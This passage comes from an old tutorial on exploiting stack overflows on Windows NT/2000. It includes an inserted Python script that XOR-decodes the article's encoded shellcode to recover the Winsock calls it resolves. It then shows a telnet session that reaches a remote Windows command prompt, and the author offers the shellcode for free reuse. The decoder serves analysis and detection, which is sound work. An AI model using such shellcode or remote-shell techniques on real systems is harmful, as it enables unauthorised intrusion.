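    0xfa, 0xf5, 0xf6, 0xea, 0xfc, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,  # closesocket\0
])

# The four address bytes as the article stores them, in listing order
# LLB4, LLB3, LLB2, LLB1 = (50h, 30h, 40h, 00h), each xored with 99h.
ENCODED_LLB = bytes([0x50 ^ XOR_KEY, 0x30 ^ XOR_KEY, 0x40 ^ XOR_KEY, 0x00 ^ XOR_KEY])


def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    """Undo the single-byte XOR (XOR with the same key is its own inverse)."""
    return bytes(b ^ key for b in data)


def has_nul(data: bytes) -> bool:
    """True if the buffer contains a 00h byte, which would cut a C string copy short."""
    return b"\x00" in data


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Extract runs of printable ASCII of at least min_len bytes (a 'strings'-style pass)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def recover_dword(encoded4: bytes, key: int = XOR_KEY) -> int:
    """Decode four stored bytes and read them as a little-endian 32-bit value."""
    return int.from_bytes(xor_decode(encoded4, key), "little")


def analyse(encoded: bytes) -> dict:
    """Summarise what an analyst learns from an encoded body: null-freedom and resolved names."""
    decoded = xor_decode(encoded)
    return {
        "nul_in_encoded": has_nul(encoded),
        "nul_in_decoded": has_nul(decoded),
        "names": printable_strings(decoded),
    }


if __name__ == "__main__":
    report = analyse(ENCODED_SLICE)
    print("null bytes in encoded body:", report["nul_in_encoded"])
    print("null bytes once decoded   :", report["nul_in_decoded"])
    print("names resolved by payload :", ", ".join(report["names"]))
    print("patched import slot       : %08X" % recover_dword(ENCODED_LLB))
```

The decoded names (the Winsock entry points the payload looks up by hand) are exactly the kind of artifact that survives the XOR only after decoding, which is why a plain strings scan of the encoded blob finds nothing; a detection or triage script has to apply the key first. The same routine recovers 00403050 from the four LLB bytes, confirming the import slot the article patches in.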

	Let's verify that we have control over a remote console ...


	$ uname
	Linux

	$ telnet mana.mareas.deepzone.org 8008
	Trying 192.168.14.34...
	Connected to mana.mareas.deepzone.org.
	Escape character is '^]'.

	Microsoft Windows 2000 [Version 5.00.2195]
	(C) Copyright 1985-1999 Microsoft Corp.

	C:>


	last words ...
	______________

	
	With this article we have tried to show an efficient and
	quick way to exploit stack overflows in WinNT/2k. At the
	same time, we are providing you with a portable shellcode
	which can be easily integrated and used freely without any
	restriction.

	The latest updates of this article and the optimizations of
	this code can be downloaded from http://www.deepzone.org


	---

	[1] "Smashing The Stack For Fun And Profit"
	    http://www.phrack.com/search.phtml?view&article=p49-14

	    "Win32 Buffer Overflows (Location, Exploitation and Prevention)"
	    http://www.phrack.com/search.phtml?view&article=p55-15


	___________________________________________________________________

					     		       -- |Zan/DZ
							<izan@deepzone.org>
	___________________________________________________________________
	
